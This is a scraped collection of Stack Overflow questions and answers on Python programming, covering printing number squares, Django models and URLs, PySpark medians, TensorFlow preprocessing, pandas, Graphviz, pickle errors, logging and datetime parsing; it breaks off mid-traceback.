| 0 | 2016-08-03T14:02:03Z | [
"python",
"elasticsearch"
] |
A better code to make an empty square with using numbers | 38,743,349 | <p>Hi, I want to make an empty (hollow) square of numbers, and I have code like this:</p>
<pre><code>L = input ('input your numbers = ')
M = (L-2) * ' '
P = L - 1
x = ""
y = ""
for a in range(1,L+1):
x = x + str(a)
print x
for b in range(2,L):
print str(b) + M + str(P)
P-=1
for c in range(L,0,-1):
y = y + str(c)
print y
</code></pre>
<p>I just want to know if you can help me write better code; I'm not quite satisfied with mine. Maybe you can suggest alternative approaches (add some condition, or produce the incrementing and decrementing numbers with a single function?). By the way, this is my first time asking here.</p>
<p>Thanks!</p>
| 0 | 2016-08-03T12:13:28Z | 38,743,894 | <p>Not exactly the same output as yours (due to <code>print</code> placing a space after each digit), but an example of how to accomplish the same thing by detecting the edges and computing the value:</p>
<pre><code>n = input('> ')
m = n-1
for i in range(n):
for j in range(n):
if i == 0 or j == 0: # top or left edge
print 1+i+j,
elif i == m or j == m: # right or bottom edge
print 2*n-1-i-j ,
else: # inside
print ' ',
print
</code></pre>
| 1 | 2016-08-03T12:36:34Z | [
"python",
"python-3.x"
] |
A better code to make an empty square with using numbers | 38,743,349 | <p>Hi, I want to make an empty (hollow) square of numbers, and I have code like this:</p>
<pre><code>L = input ('input your numbers = ')
M = (L-2) * ' '
P = L - 1
x = ""
y = ""
for a in range(1,L+1):
x = x + str(a)
print x
for b in range(2,L):
print str(b) + M + str(P)
P-=1
for c in range(L,0,-1):
y = y + str(c)
print y
</code></pre>
<p>I just want to know if you can help me write better code; I'm not quite satisfied with mine. Maybe you can suggest alternative approaches (add some condition, or produce the incrementing and decrementing numbers with a single function?). By the way, this is my first time asking here.</p>
<p>Thanks!</p>
| 0 | 2016-08-03T12:13:28Z | 38,744,804 | <pre><code>string = map(str,range(1,L+1))
print ''.join(string)
print '\n'.join([ i+M+j for i,j in zip(string[1:-1],string[1:-1][::-1])])
print ''.join(string[::-1])
</code></pre>
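<p>Since the question is tagged python-3.x while both answers use Python 2 <code>print</code> statements, here is a sketch of the same idea that runs on Python 3 (the function name is my own):</p>

```python
def hollow_square(n):
    """Return the same hollow square as the question's code, as one string."""
    digits = [str(i) for i in range(1, n + 1)]
    top = ''.join(digits)
    middle = [down + ' ' * (n - 2) + up
              for down, up in zip(digits[1:-1], digits[-2:0:-1])]
    bottom = ''.join(reversed(digits))
    return '\n'.join([top] + middle + [bottom])

print(hollow_square(4))
# 1234
# 2  3
# 3  2
# 4321
```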
| 0 | 2016-08-03T13:17:59Z | [
"python",
"python-3.x"
] |
Best way to create a Day model in Django | 38,743,403 | <p>I want to create an object called Day and in that I want to store other object instances called Meeting.</p>
<p>My question is:
What is the best way to create the Day object with a datetime reference? Is there a built-in model structure that lets me use days as objects, or should I simply create a model called Day and give it a datetime field?</p>
<p>Thanks in advance from a noobie <3</p>
| 0 | 2016-08-03T12:15:40Z | 38,743,810 | <p>I would structure your database like this:</p>
<pre><code>class DayModel(models.Model):
date = models.DateField()
class MeetingModel(models.Model):
day = models.ForeignKey(DayModel, related_name="meetings")
time = models.TimeField()
</code></pre>
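<p>The split this model makes (a <code>DateField</code> on the day, a <code>TimeField</code> on the meeting) mirrors the standard library's date/time pair. A server-free sketch with made-up data, showing how meetings group under their day:</p>

```python
import datetime
from collections import defaultdict

# Made-up meeting datetimes, standing in for MeetingModel rows
meetings = [
    datetime.datetime(2016, 8, 3, 9, 0),
    datetime.datetime(2016, 8, 3, 14, 30),
    datetime.datetime(2016, 8, 4, 11, 15),
]

by_day = defaultdict(list)   # plays the role of DayModel plus the related_name
for m in meetings:
    by_day[m.date()].append(m.time())

print(sorted(by_day[datetime.date(2016, 8, 3)]))
```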
| 0 | 2016-08-03T12:33:19Z | [
"python",
"django",
"django-models"
] |
How to find the median in Apache Spark with Python Dataframe API? | 38,743,476 | <p>The PySpark API provides many aggregate functions, but not the median. Spark 2 comes with approxQuantile, which gives approximate quantiles, but an exact median is very expensive to calculate. Is there a more PySpark-idiomatic way of calculating the median for a column of values in a Spark DataFrame?</p>
| 0 | 2016-08-03T12:19:01Z | 38,743,477 | <p>Here is an example implementation with Dataframe API in Python (Spark 1.6 +).</p>
<pre><code>import pyspark.sql.functions as F
from pyspark.sql.types import FloatType
import numpy as np
</code></pre>
<p>Let's assume we have monthly salaries for customers in "salaries" spark dataframe such as: </p>
<p><strong>month | customer_id | salary</strong></p>
<p>and we would like to find the median salary per customer throughout all the months</p>
<p>Step1: Write a user defined function to calculate the median</p>
<pre><code>def find_median(values_list):
try:
median = np.median(values_list) #get the median of values in a list in each row
return round(float(median),2)
except Exception:
return None #if there is anything wrong with the given values
median_finder = F.udf(find_median,FloatType())
</code></pre>
<p>Step 2: Aggregate on the salary column by collecting them into a list of salaries in each row:</p>
<pre><code>salaries_list = salaries.groupBy("customer_id").agg(F.collect_list("salary").alias("salaries"))
</code></pre>
<p>Step 3: Call the median_finder udf on the salaries column and add the median values as a new column</p>
<pre><code>salaries_list = salaries_list.withColumn("median",median_finder("salaries"))
</code></pre>
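<p>As a sanity check, the exact-median logic the UDF wraps can be reproduced with the standard library (the salary numbers here are made up):</p>

```python
import statistics

# Same behavior as the UDF body, without numpy: exact median of a
# collected list, rounded to 2 decimals, None for bad input.
def exact_median(values_list):
    if not values_list:
        return None
    return round(float(statistics.median(values_list)), 2)

median_salary = exact_median([3000, 4200, 3100, 5000])
```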
| 0 | 2016-08-03T12:19:01Z | [
"python",
"apache-spark",
"pyspark",
"median"
] |
How to perform mean subtraction and normalization with Tensorflow | 38,743,506 | <p>On <a href="http://cs231n.github.io/neural-networks-2/" rel="nofollow">http://cs231n.github.io/neural-networks-2/</a> it is mentioned that for convolutional neural networks it is preferred to preprocess data using mean subtraction and normalization techniques.</p>
<p>I was just wondering how would it be best approached using Tensorflow.</p>
<p>Mean substraction</p>
<pre><code>X -= np.mean(X)
</code></pre>
<p>Normalization</p>
<pre><code>X /= np.std(X, axis = 0)
</code></pre>
| 0 | 2016-08-03T12:20:49Z | 38,744,527 | <p>You're looking for <a href="https://www.tensorflow.org/versions/master/api_docs/python/image.html#per_image_whitening" rel="nofollow"><code>tf.image.per_image_whitening(image)</code></a>:</p>
<blockquote>
<p>Linearly scales image to have zero mean and unit norm.</p>
<p>This op computes (x - mean) / adjusted_stddev, where mean is the average of all values in image, and adjusted_stddev = max(stddev, 1.0/sqrt(image.NumElements())).</p>
</blockquote>
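<p>The arithmetic in that description can be sketched in plain Python (this is an illustration of the formula, not the TensorFlow op itself):</p>

```python
import math

def per_image_whiten(pixels):
    """Zero-mean, unit-norm scaling with the stddev floored at 1/sqrt(N),
    so a constant image does not divide by ~0."""
    n = len(pixels)
    mean = sum(pixels) / float(n)
    var = sum((p - mean) ** 2 for p in pixels) / float(n)
    adjusted_stddev = max(math.sqrt(var), 1.0 / math.sqrt(n))
    return [(p - mean) / adjusted_stddev for p in pixels]

whitened = per_image_whiten([1.0, 2.0, 3.0, 4.0])
flat = per_image_whiten([5.0, 5.0, 5.0, 5.0])  # constant image stays finite
```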
| 0 | 2016-08-03T13:04:35Z | [
"python",
"tensorflow"
] |
How to perform mean subtraction and normalization with Tensorflow | 38,743,506 | <p>On <a href="http://cs231n.github.io/neural-networks-2/" rel="nofollow">http://cs231n.github.io/neural-networks-2/</a> it is mentioned that for convolutional neural networks it is preferred to preprocess data using mean subtraction and normalization techniques.</p>
<p>I was just wondering how would it be best approached using Tensorflow.</p>
<p>Mean substraction</p>
<pre><code>X -= np.mean(X)
</code></pre>
<p>Normalization</p>
<pre><code>X /= np.std(X, axis = 0)
</code></pre>
| 0 | 2016-08-03T12:20:49Z | 39,831,856 | <p>Looking in the source code for <a href="https://github.com/tensorflow/tensorflow/blob/master/tensorflow/contrib/layers/python/layers/feature_column.py" rel="nofollow">feature columns</a> I noticed for real_valued_column types there is a keyword argument normalizer that can take as an argument a default normalization function to apply to each element of the tensor:</p>
<pre><code>real_valued_column("col_name", normalizer = lambda x: (x-X.mean())/X.std())
</code></pre>
<p>Where X is your data. I think the advantage here is the normalization can be applied in the course of a tensor flow graph on a purpose built machine. Also the normalization function can be easily customized.</p>
| 0 | 2016-10-03T12:36:48Z | [
"python",
"tensorflow"
] |
How to fetch specific rows from a tensor in Tensorflow? | 38,743,538 | <p>I have a tensor defined as follows:</p>
<pre><code>temp_var = tf.Variable(initial_value=np.asarray([[1, 2, 3],[4, 5, 6],[7, 8, 9],[10, 11, 12]]))
</code></pre>
<p>I also have an array of indexes of rows to be fetched from tensor:</p>
<pre><code>idx = tf.constant([0, 2])
</code></pre>
<p>Now I want to take a subset of <code>temp_var</code> at those indexes i.e. <code>idx</code></p>
<p>I know that to take a single index or a slice, we can do something like</p>
<pre><code>temp_var[single_row_index, :]
</code></pre>
<p>or </p>
<pre><code>temp_var[start:end, :]
</code></pre>
<p>But how to fetch rows indicated by <code>idx</code> array?
Something like <code>temp_var[idx, :]</code> ?</p>
| 0 | 2016-08-03T12:22:07Z | 38,746,778 | <p>The <a href="https://www.tensorflow.org/versions/r0.10/api_docs/python/array_ops.html#gather" rel="nofollow"><code>tf.gather()</code></a> op does exactly what you need: it selects rows from a matrix (or in general (N-1)-dimensional slices from an N-dimensional tensor). Here's how it would work in your case:</p>
<pre><code>temp_var = tf.Variable([[1, 2, 3], [4, 5, 6], [7, 8, 9], [10, 11, 12]])
idx = tf.constant([0, 2])
rows = tf.gather(temp_var, idx)
init = tf.initialize_all_variables()
sess = tf.Session()
sess.run(init)
print(sess.run(rows)) # ==> [[1, 2, 3], [7, 8, 9]]
</code></pre>
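<p>For intuition, <code>tf.gather</code> along axis 0 is just "pick these rows"; the same selection in plain Python:</p>

```python
# Row selection by an index list, mirroring tf.gather(temp_var, idx)
temp_var = [[1, 2, 3], [4, 5, 6], [7, 8, 9], [10, 11, 12]]
idx = [0, 2]

rows = [temp_var[i] for i in idx]
```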
| 1 | 2016-08-03T14:41:28Z | [
"python",
"tensorflow"
] |
Debug behavior differ from normal execution in python | 38,743,551 | <p>I am trying to figure out why my code behavior differs from normal execution. I have seen this, but it is not my case:</p>
<blockquote>
<p><a href="http://stackoverflow.com/questions/1108246/what-to-do-if-debug-behaviour-differs-from-normal-execution">What to do, if debug behaviour differs from normal execution?</a></p>
<p><a href="http://stackoverflow.com/questions/25379294/python2-7-using-debug-behave-different-then-without-debug">python2.7 using debug behave different then without debug</a></p>
</blockquote>
<p>I'm parsing an XML document to a DataFrame, so I can convert into a csv or excel file. With normal execution, it only parses the last "CPE" of the "LOCALIDADE" node.</p>
<p>This is a chunk of my xml file:</p>
<pre><code><DISTRITO xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<NOME_DISTRITO>BRAGANCA</NOME_DISTRITO>
<CONCELHO>
<NOME_CONCELHO>ALFANDEGA DA FE</NOME_CONCELHO>
<FREGUESIA>
<NOME_FREGUESIA>AGROBOM</NOME_FREGUESIA>
<LOCALIDADE>
<NOME_LOCALIDADE>AGROBOM</NOME_LOCALIDADE>
<CODIGO_POSTAL>5350</CODIGO_POSTAL>
<CPE>PT2000022152377DE</CPE>
<CPE>PT2000022152388XX</CPE>
<CPE>PT2000022152399XK</CPE>
<CPE>PT2000022152402BR</CPE>
<CPE>PT2000022152424NT</CPE>
</LOCALIDADE>
</FREGUESIA>
<FREGUESIA>
<NOME_FREGUESIA>ALFANDEGA DA FE</NOME_FREGUESIA>
<LOCALIDADE>
<NOME_LOCALIDADE>ALFANDEGA DA FE</NOME_LOCALIDADE>
<CODIGO_POSTAL>5350</CODIGO_POSTAL>
<CPE>PT2000022153052QF</CPE>
<CPE>PT2000022153085VV</CPE>
<CPE>PT2000022153108HV</CPE>
<CPE>PT2000022153119LM</CPE>
</LOCALIDADE>
</FREGUESIA>
</CONCELHO>
</DISTRITO>
</code></pre>
<p>This code works for me when I am debugging it:</p>
<pre><code>import xml.etree.ElementTree as et
import pandas as pd
path = '/Path/toFile.xml'
data = []
for (ev,el) in et.iterparse(path):
print (el.tag, el.text)
if el.tag == 'NOME_DISTRITO': nome = el.text
if el.tag == 'NOME_CONCELHO': nc = el.text
if el.tag == 'NOME_FREGUESIA': nf = el.text
if el.tag == 'NOME_LOCALIDADE': nl = el.text
if el.tag == "LOCALIDADE":
inner = {}
inner['NOME_DISTRITO'] = nome
inner['NOME_CONCELHO'] = nc
inner['NOME_FREGUESIA'] = nf
for i in el:
print (i.tag,i.text)
print(data)
inner[i.tag] = i.text
if inner.has_key('CPE'):
data.append(inner)
df = pd.DataFrame(data)
df.to_csv('/Users/DanielMelo/Documents/Endesa/Portugal/CPE.csv',columns=['CPE','NOME_CONCELHO','NOME_FREGUESIA',
'NOME_LOCALIDADE','CODIGO_POSTAL'])
</code></pre>
<p>But this is the result when I run with normal execution:</p>
<pre><code>CPE NOME_CONCELHO NOME_FREGUESIA NOME_LOCALIDADE CODIGO_POSTAL
PT2000022152424NT ALFANDEGA DA FE AGROBOM AGROBOM 5350
PT2000022152424NT ALFANDEGA DA FE AGROBOM AGROBOM 5350
PT2000022152424NT ALFANDEGA DA FE AGROBOM AGROBOM 5350
PT2000022152424NT ALFANDEGA DA FE AGROBOM AGROBOM 5350
PT2000022152424NT ALFANDEGA DA FE AGROBOM AGROBOM 5350
PT2000022153119LM ALFANDEGA DA FE ALFANDEGA DA FE ALFANDEGA DA FE 5350
PT2000022153119LM ALFANDEGA DA FE ALFANDEGA DA FE ALFANDEGA DA FE 5350
PT2000022153119LM ALFANDEGA DA FE ALFANDEGA DA FE ALFANDEGA DA FE 5350
PT2000022153119LM ALFANDEGA DA FE ALFANDEGA DA FE ALFANDEGA DA FE 5350
</code></pre>
<p>I don't know if it could be a problem when I append the dict into my list, or some kind of conflict when it is trying to convert to csv (which I don't think is the case). </p>
<p>But as I said, it works and gives the result I want when I am debugging, so I cannot see what the problem is.</p>
| 0 | 2016-08-03T12:22:37Z | 38,743,642 | <p>You are repeatedly adding the <em>same dictionary</em> to the list. Python containers store <em>references</em>, not copies, so any alteration you make to that dictionary is going to be visible through all those references.</p>
<p>Yes, printing the dictionary inside the loop only shows its state at that moment, before the next iteration alters it. You never print the entries you already appended to the list, so you don't see those references reflect the later changes.</p>
<p>Add a copy of the dictionary instead:</p>
<pre><code>if inner.has_key('CPE'):
data.append(inner.copy())
</code></pre>
<p>You can easily reproduce your problem in an interactive session:</p>
<pre><code>>>> data = []
>>> inner = {'foo': 'bar'}
>>> data.append(inner)
>>> data
[{'foo': 'bar'}]
>>> inner['foo'] = 'spam'
>>> inner
{'foo': 'spam'}
>>> data # note that the data list *also* changed!
[{'foo': 'spam'}]
>>> data = [] # start anew
>>> inner = {'foo': 'bar'}
>>> data.append(inner.copy()) # add a (shallow) copy
>>> data
[{'foo': 'bar'}]
>>> inner['foo'] = 'spam'
>>> data
[{'foo': 'bar'}]
>>> data.append(inner.copy())
>>> data
[{'foo': 'bar'}, {'foo': 'spam'}]
</code></pre>
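<p>One caveat on <code>.copy()</code>: it is a <em>shallow</em> copy, so mutable values (e.g. a nested list) are still shared; use <code>copy.deepcopy</code> if that matters. A quick illustration (the CPE values are just sample strings):</p>

```python
import copy

# dict.copy() copies only the top level; nested mutables stay shared.
inner = {'CPE': ['PT2000022152377DE']}
shallow = inner.copy()
deep = copy.deepcopy(inner)

inner['CPE'].append('PT2000022152388XX')  # visible through the shallow copy
```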
| 2 | 2016-08-03T12:26:20Z | [
"python",
"pandas"
] |
Graphviz: write result to file | 38,743,578 | <p>I have dataframe</p>
<pre><code>ID domain search_term
111  vk.com        вконтакте
111  twitter.com   фейсбук
111  facebook.com  твиттер
222  avito.ru      купить машину
222  vk.com        вконтакте
333  twitter.com   твиттер
333  apple.com     купить айфон
333  rbk.ru        новости
</code></pre>
<p>I try to create chain with nodes and write it to file. I use</p>
<pre><code>domains = df['domain'].values.tolist()
search_terms = df['search_term'].values.tolist()
ids = df['ID'].values.tolist()
f = Digraph('finite_state_machine', filename='fsm.gv', encoding='utf-8')
f.body.extend(['rankdir=LR', 'size="5,5"'])
f.attr('node', shape='circle')
for i, (id, domain, search_term) in enumerate(zip(ids, domains, search_terms)):
if ids[i] == ids[i - 1]:
f.edge(domains[i - 1], domains[i], label=search_terms[i])
f.view()
</code></pre>
<p>It returns <a href="http://i.stack.imgur.com/YbhSq.png" rel="nofollow"><img src="http://i.stack.imgur.com/YbhSq.png" alt="this file"></a>
But I want to save each chain to its own file, named after its <code>ID</code>: I need to get files <code>111</code>, <code>222</code>, <code>333</code>.
I tried</p>
<pre><code>for i, (id, domain, search_term) in enumerate(zip(ids, domains, search_terms)):
if ids[i] == ids[i - 1]:
f = Digraph('finite_state_machine', filename='fsm.gv', encoding='utf-8')
f.body.extend(['rankdir=LR', 'size="5,5"'])
f.attr('node', shape='circle')
f.edge(domains[i - 1], domains[i], label=search_terms[i])
f.render(filename=str(id))
</code></pre>
<p>But it works incorrectly. For <code>111</code> and <code>333</code> it should produce chains with 3 nodes, but in the files I get chains with only 2 nodes. This is the file for <code>111</code>:
<a href="http://i.stack.imgur.com/Mb431.png" rel="nofollow"><img src="http://i.stack.imgur.com/Mb431.png" alt="result"></a>
What am I doing wrong and how can I fix it?</p>
| 0 | 2016-08-03T12:24:00Z | 38,743,987 | <p>Do not put <code>f = Digraph(...)</code> and <code>f.render(...)</code> inside the <code>if-statement</code>. The code inside the <code>if-statement</code> should get executed once for every edge. You do not want to create a new <code>Digraph</code> and render it for every edge.</p>
<p>So instead, you could use <code>df.groupby</code> to have Pandas identify the rows with the same <code>ID</code>. Then call <code>f = Digraph(...)</code> and <code>f.render(...)</code> once for every group:</p>
<pre><code>for id_key, group in df.groupby('ID'):
f = Digraph('finite_state_machine', filename='fsm.gv', encoding='utf-8')
f.body.extend(['rankdir=LR', 'size="5,5"'])
f.attr('node', shape='circle')
for i in range(len(group)-1):
f.edge(group['domain'].iloc[i], group['domain'].iloc[i+1],
label=group['search_term'].iloc[i+1])
f.render(filename=str(id_key))
</code></pre>
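<p>If it helps to see the grouping idea without pandas, here is a rough standard-library sketch of "group rows by ID, then turn consecutive domains into edges" (sample data mirrors the question):</p>

```python
from itertools import groupby

# Records must be sorted by the grouping key; sorting only on ID keeps
# the original within-ID order (Python's sort is stable).
rows = [
    ('111', 'vk.com'), ('111', 'twitter.com'), ('111', 'facebook.com'),
    ('222', 'avito.ru'), ('222', 'vk.com'),
    ('333', 'twitter.com'), ('333', 'apple.com'), ('333', 'rbk.ru'),
]

edges_per_id = {}
for id_key, group in groupby(sorted(rows, key=lambda r: r[0]), key=lambda r: r[0]):
    domains = [domain for _, domain in group]
    # consecutive pairs become the edges of one chain
    edges_per_id[id_key] = list(zip(domains, domains[1:]))
```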
| 2 | 2016-08-03T12:40:54Z | [
"python",
"pandas",
"matplotlib",
"graphviz"
] |
EOF Error Pickle | 38,743,646 | <p>I am looping through a list of Pickled files and some of my files have EOF Errors, which means they did not write properly. Is there a way to loop around the files that have these errors and continue to the next file instead of the entire script stopping?</p>
| -2 | 2016-08-03T12:26:35Z | 38,743,699 | <p>Use <code>try/except</code>:</p>
<pre><code>for pkl_file in pkls:
try:
obj = pickle.load(..) # or however you load the file
except EOFError:
continue
# rest of code, handling obj
</code></pre>
| 1 | 2016-08-03T12:28:46Z | [
"python",
"pickle"
] |
EOF Error Pickle | 38,743,646 | <p>I am looping through a list of Pickled files and some of my files have EOF Errors, which means they did not write properly. Is there a way to loop around the files that have these errors and continue to the next file instead of the entire script stopping?</p>
| -2 | 2016-08-03T12:26:35Z | 38,743,923 | <p>First of all, ensure that you are opening the pickle files in <em>binary</em> mode as this is a potential cause of EOF errors when reading/writing pickle data.</p>
<p>When you are reading the pickle files use <code>rb</code> mode when calling <a href="https://docs.python.org/3/library/functions.html?highlight=open#open" rel="nofollow"><code>open()</code></a>. Similarly, if it is your code that is writing the pickle files, ensure that the files are written in binary mode by specifying mode <code>wb</code>.</p>
<p>Secondly catch the exception and ignore it, where "ignore" means that you issue a warning message so any genuinely bad pickle files will be noticed.</p>
<pre><code>import cPickle as pickle
for filename in pickle_files:
try:
with open(filename, 'rb') as f:
data = pickle.load(f)
# use the data
except EOFError as exc:
print(exc)
</code></pre>
| 0 | 2016-08-03T12:38:18Z | [
"python",
"pickle"
] |
how to use pandas dataframe after splitting my test set? | 38,743,888 | <p>I have recently learned how to do a validation split on my pandas dataframe, but after splitting I noticed that I am not able to slice my columns.</p>
<pre><code>print(my_data['column name'])
</code></pre>
<p>It is throwing an error; please help.</p>
<p>My code goes like this:</p>
<pre><code>import pandas as pd
from sklearn.cross_validation import train_test_split
data = pd.read_csv("labeledTrainData.tsv" , header = 0 , \
delimiter = '\t' , quoting = 3)
train , test = train_test_split(data , train_size = 0.8 , random_state = 38)
print(len(train['sentiment']))
</code></pre>
<p>Please tell me whether this problem occurs with numpy too.</p>
| 1 | 2016-08-03T12:36:21Z | 38,744,020 | <p><a href="http://scikit-learn.org/stable/modules/generated/sklearn.cross_validation.train_test_split.html" rel="nofollow"><code>train_test_split</code></a> returns a list of the splits, you're supposed to use these to index the df:</p>
<pre><code>X_train, X_test, y_train, y_test =train_test_split(data , train_size = 0.8 , random_state = 38)
</code></pre>
<p>then you index like so:</p>
<pre><code>data.iloc[X_train]
data.iloc[X_test]
data.iloc[y_train]
data.iloc[y_test]
</code></pre>
| 3 | 2016-08-03T12:42:20Z | [
"python",
"validation",
"pandas",
"numpy",
"scikit-learn"
] |
how to use pandas dataframe after splitting my test set? | 38,743,888 | <p>I have recently learned how to do a validation split on my pandas dataframe, but after splitting I noticed that I am not able to slice my columns.</p>
<pre><code>print(my_data['column name'])
</code></pre>
<p>It is throwing an error; please help.</p>
<p>My code goes like this:</p>
<pre><code>import pandas as pd
from sklearn.cross_validation import train_test_split
data = pd.read_csv("labeledTrainData.tsv" , header = 0 , \
delimiter = '\t' , quoting = 3)
train , test = train_test_split(data , train_size = 0.8 , random_state = 38)
print(len(train['sentiment']))
</code></pre>
<p>Please tell me whether this problem occurs with numpy too.</p>
| 1 | 2016-08-03T12:36:21Z | 38,744,439 | <p>If we input simple numpy arrays, the outputs are numpy arrays too. See an example <a href="http://scikit-learn.org/stable/modules/generated/sklearn.cross_validation.train_test_split.html" rel="nofollow">here</a>:</p>
<pre><code>>>> import numpy as np
>>> from sklearn.cross_validation import train_test_split
>>> X, y = np.arange(10).reshape((5, 2)), range(5)
>>> X
array([[0, 1],
[2, 3],
[4, 5],
[6, 7],
[8, 9]])
>>> list(y)
[0, 1, 2, 3, 4]
>>>
>>> X_train, X_test, y_train, y_test = train_test_split(
... X, y, test_size=0.33, random_state=42)
...
>>> X_train
array([[4, 5],
[0, 1],
[6, 7]])
>>> y_train
[2, 0, 3]
>>> X_test
array([[2, 3],
[8, 9]])
>>> y_test
[1, 4]
</code></pre>
<h1>EDIT</h1>
<p>I tried the same thing but i did not get any errors, I am using Python 2.7+. So is this something specific to different version of Python or Scikitlearn</p>
<pre><code> import pandas as pd
from sklearn.cross_validation import train_test_split
url = 'https://raw.github.com/pydata/pandas/master/pandas/tests/data/tips.csv'
data = pd.read_csv(url)
train , test = train_test_split(data ,train_size = 0.8 , random_state = 38)
print (train['total_bill'])
Output:
....
211 25.89
53 9.94
75 10.51
161 12.66
Name: total_bill, dtype: float64
</code></pre>
| 0 | 2016-08-03T13:01:16Z | [
"python",
"validation",
"pandas",
"numpy",
"scikit-learn"
] |
See current logging config in Python (Django) | 38,744,092 | <p>I am setting up logging in Django, but for some reason I see no logs appear. Django uses Python's <code>logging</code> module (I use Python 2.7).</p>
<p>Is there a way I can see the currently configured logging setup, something like a <code>logging.getConfigDict()</code> or so?</p>
| 1 | 2016-08-03T12:45:12Z | 38,765,453 | <p>There's the <code>logging_tree</code> module for that:</p>
<p><code>pip install logging_tree</code></p>
<p>and then (via <code>./manage.py shell</code>)</p>
<pre><code>import logging_tree
logging_tree.printout()
</code></pre>
<p>More infos: <a href="http://rhodesmill.org/brandon/2012/logging_tree/" rel="nofollow">http://rhodesmill.org/brandon/2012/logging_tree/</a></p>
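<p>If installing a package is not an option, a rough stdlib-only inspection is possible by walking logging's (internal, undocumented) logger registry, which is essentially what <code>logging_tree</code> reads:</p>

```python
import logging

# Sample configuration so there is something to inspect
logging.getLogger('myapp').setLevel(logging.DEBUG)
logging.getLogger('myapp.sub').addHandler(logging.StreamHandler())

# Walk the manager's registry; skip PlaceHolder entries for
# intermediate dotted names that were never configured.
summary = {}
for name, logger in sorted(logging.Logger.manager.loggerDict.items()):
    if isinstance(logger, logging.Logger):
        summary[name] = (logging.getLevelName(logger.level),
                         [type(h).__name__ for h in logger.handlers])
```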
| 1 | 2016-08-04T10:57:40Z | [
"python",
"django",
"logging"
] |
glob error <_io.TextIOWrapper name='...' mode='r' encoding='cp1252'> reading text file error | 38,744,244 | <p>I am trying to make a social program where the profiles are stored in .txt files.
Here is part of the code:</p>
<pre><code>XX = []
pl = glob.glob('*.txt')
for a in pl:
if ' pysocial profile.txt' in a:
print(a)
O = 2
XX.append(a)
if O == 2:
P = input('choose profile>')
if P in XX:
G = open(P, 'r')
print(G)
</code></pre>
<p>I try this,
but when it executes the <code>print(G)</code> part it comes out with this:</p>
<pre><code><_io.TextIOWrapper name='Freddie Taylor pysocial profile.txt' mode='r' encoding='cp1252'>
</code></pre>
<p>how can I make it read the file?</p>
| -3 | 2016-08-03T12:52:30Z | 38,744,973 | <p>The <code>open</code> method opens the file and returns a <code>TextIOWrapper</code> object but does not read the files content.</p>
<p>To actually get the content of the file, you need to call the <code>read</code> method on that object, like so:</p>
<pre><code>G = open(P, 'r')
print(G.read())
</code></pre>
<p>However, you should take care of closing the file by either calling the <code>close</code> method on the file object or using the <code>with open(...)</code> syntax which will ensure the file is properly closed, like so:</p>
<pre><code>with open(P, 'r') as G:
print(G.read())
</code></pre>
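<p>A small self-contained round trip showing the difference between the file object and its contents (the file is created in a temp directory; the profile name is just the one from the question):</p>

```python
import os
import tempfile

# Write a sample profile, then read it back: open() returns a file
# object, and .read() returns the text inside it.
path = os.path.join(tempfile.mkdtemp(), 'Freddie Taylor pysocial profile.txt')
with open(path, 'w') as f:
    f.write('name: Freddie Taylor\n')

with open(path, 'r') as g:
    content = g.read()  # the string, not the TextIOWrapper repr
```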
| 0 | 2016-08-03T13:26:08Z | [
"python"
] |
format date 'Fri Apr 15 04_01_33 2016' and '2015-12-16 22-39-28' Using python datetime format date | 38,744,270 | <p>Here is a simple way to format dates using datetime:</p>
<pre><code>from datetime import datetime
date = '2016-04-07 04-54-53'
date1 = 'Fri Apr 15 04_01_33 2016'
format = "%Y-%m-%d %H-%M-%S"
format1 = "%a %b %d %H_%M_%S %Y"
dt = datetime.strptime(date, format)
dt1 = datetime.strptime(date1, format1)
print(dt)
print(dt1)
</code></pre>
<p>Output :</p>
<pre><code>2016-04-07 04:54:53
2016-04-15 04:01:33
</code></pre>
| -5 | 2016-08-03T12:53:41Z | 38,744,299 | <p><strong>A simple way to format dates using datetime</strong></p>
<pre><code>from datetime import datetime
date = '2016-04-07 04-54-53'
date1 = 'Fri Apr 15 04_01_33 2016'
format = "%Y-%m-%d %H-%M-%S"
format1 = "%a %b %d %H_%M_%S %Y"
dt = datetime.strptime(date, format)
dt1 = datetime.strptime(date1, format1)
print(dt)
print(dt1)
</code></pre>
<p>Output :</p>
<pre><code>2016-04-07 04:54:53
2016-04-15 04:01:33
</code></pre>
<p>Vote if you get right ans</p>
| 0 | 2016-08-03T12:55:13Z | [
"python",
"django",
"datetime"
] |
Django URLs error: view must be a callable or a list/tuple in the case of include() | 38,744,285 | <p>After upgrading to Django 1.10, I get the error:</p>
<pre><code>TypeError: view must be a callable or a list/tuple in the case of include().
</code></pre>
<p>My urls.py is as follows:</p>
<pre><code>urlpatterns = [
url(r'^$', 'myapp.views.home'),
url(r'^contact$', 'myapp.views.contact'),
url(r'^login/$', 'django.contrib.auth.views.login'),
]
</code></pre>
<p>The full traceback is:</p>
<pre><code>Traceback (most recent call last):
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/utils/autoreload.py", line 226, in wrapper
fn(*args, **kwargs)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/management/commands/runserver.py", line 121, in inner_run
self.check(display_num_errors=True)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/management/base.py", line 385, in check
include_deployment_checks=include_deployment_checks,
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/management/base.py", line 372, in _run_checks
return checks.run_checks(**kwargs)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/checks/registry.py", line 81, in run_checks
new_errors = check(app_configs=app_configs)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/checks/urls.py", line 14, in check_url_config
return check_resolver(resolver)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/core/checks/urls.py", line 24, in check_resolver
for pattern in resolver.url_patterns:
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/utils/functional.py", line 35, in __get__
res = instance.__dict__[self.name] = self.func(instance)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/urls/resolvers.py", line 310, in url_patterns
patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/utils/functional.py", line 35, in __get__
res = instance.__dict__[self.name] = self.func(instance)
File "/Users/alasdair/.virtualenvs/django110/lib/python2.7/site-packages/django/urls/resolvers.py", line 303, in urlconf_module
return import_module(self.urlconf_name)
File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/importlib/__init__.py", line 37, in import_module
__import__(name)
